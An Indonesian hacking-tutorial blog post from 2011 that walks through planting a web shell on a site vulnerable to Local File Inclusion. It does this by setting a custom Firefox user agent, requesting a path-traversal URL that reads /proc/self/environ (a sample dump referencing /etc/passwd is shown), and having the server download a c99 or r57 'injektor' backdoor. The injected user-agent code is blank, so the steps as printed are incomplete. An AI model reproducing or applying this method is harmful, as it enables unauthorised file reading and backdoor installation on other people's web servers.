>Upload atau tanam Shell target Local File Inclusion(LFI) via Simpel Tamper Data

February 7, 2011 at 11:57 pm | Posted in computer and technology, Hacking, Tutorial | Leave a comment

>Upload atau tanam Shell target Local File Inclusion(LFI) via Simpel Tamper Data with addons mozilla firefox

kali ini akan saya tuliskan cara backdooring LFI yang sederhana lewan addons mozilla ( tamper data )
yang start secara otomatis pada mozila

perlengkapan:
1. addon mozila “https://addons.mozilla.org/pt-BR/firefox/addons/59”
2. asumsi harus menggunakan firefox / mozilla
3. target LFI
4. injektor ( c99 / r57 / dan yang lainnya )

download addons mozila tersebut dan pasang atau instal di mozilla kalian
untuk mengaktifkan addon tersebut kalian harus seting mozilla dengan pllihan sebagai berikut:
1. pilih menu alat + default user agent + edit user agent
2 buat baru user agent
3. disini kalian hanya perlu mengganti code script pada user agent, kodenya seperti berikut:
———————————————————————————————–

Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9) Gecko/2008052906 Firefox/3.0
———————————————————————————————–
dan kalian ganti seperti berikut:
————————————————————————————–
—————————————————————————————
dan descripsi kalian isi misal saja LFI lalu tekan ok

4. untuk selanjutnya kembali menu alat dan kalian pilih default user agent + LFI
untuk menjalankan addon tersebut
5. cek menu bantuan pada mozilla dan pilih tentang mozila untuk melihat addon sudah terpasang apa belum
jika sudah terpasang akan di tampilkan code script yang kalian pasang tadi…
6. pemasangan addon mozila selesai…

http://www.site.com/index.php?page=../../../../../../../../../../../../../../../proc/self/environ
misalnya kalian dapat vuln target lfi seperti di atas
dengan ketentuan membaca /proc/self/environ untuk dapat di acces
————————————————————————————————
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin
——————————————————————————————————————————-

untuk meng-upload backdoor kalian, cukup mudah langsung saja kalian browse di mozila vulner lfi bugs tersebut
Command code akan men-download file injektor kalian secara otomatis
check bakcdoor kalian
——————————-
http://www.site.com/suck.php
——————————-
dan akhirnya mendapatkannya

Leave a Comment »

RSS feed for comments on this post. TrackBack URI

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Create a free website or blog at WordPress.com.
Entries and comments feeds.

%d bloggers like this: